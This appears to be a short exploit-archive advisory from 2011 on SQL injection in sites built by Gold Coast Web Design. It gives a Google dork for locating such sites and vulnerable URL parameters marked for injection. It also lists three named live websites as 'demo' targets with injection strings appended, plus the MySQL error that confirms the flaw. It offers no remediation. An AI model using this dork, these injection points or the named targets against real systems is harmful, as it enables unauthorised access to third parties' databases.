##########################################################
# Title: Gold Coast Web Design SQL Injection
# Author: AngelParrot
# Date: 2011/12/19
# Category: Webapps
# Vendor: http://goldcoastwebdesign.com/
# Google Dork: inurl:php?id= intext:"web site by: goldcoastwebdesign.com"
##########################################################

# Exploit
http://example.com/news.php?MenuID=[SQL]
http://example.com/services_detail.php?CategoryID=[SQL]
http://example.com/staff.php?CategoryID=*&MenuID=[SQL]

etc.

# Demo Site
http://akronpolysys.com/news.php?MenuID=27'
http://www.1stsecureit.com/services_detail.php?CategoryID=2'
http://www.caddyforacure.com/staff.php?CategoryID=3&MenuID=17'

etc.

# Error Message
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1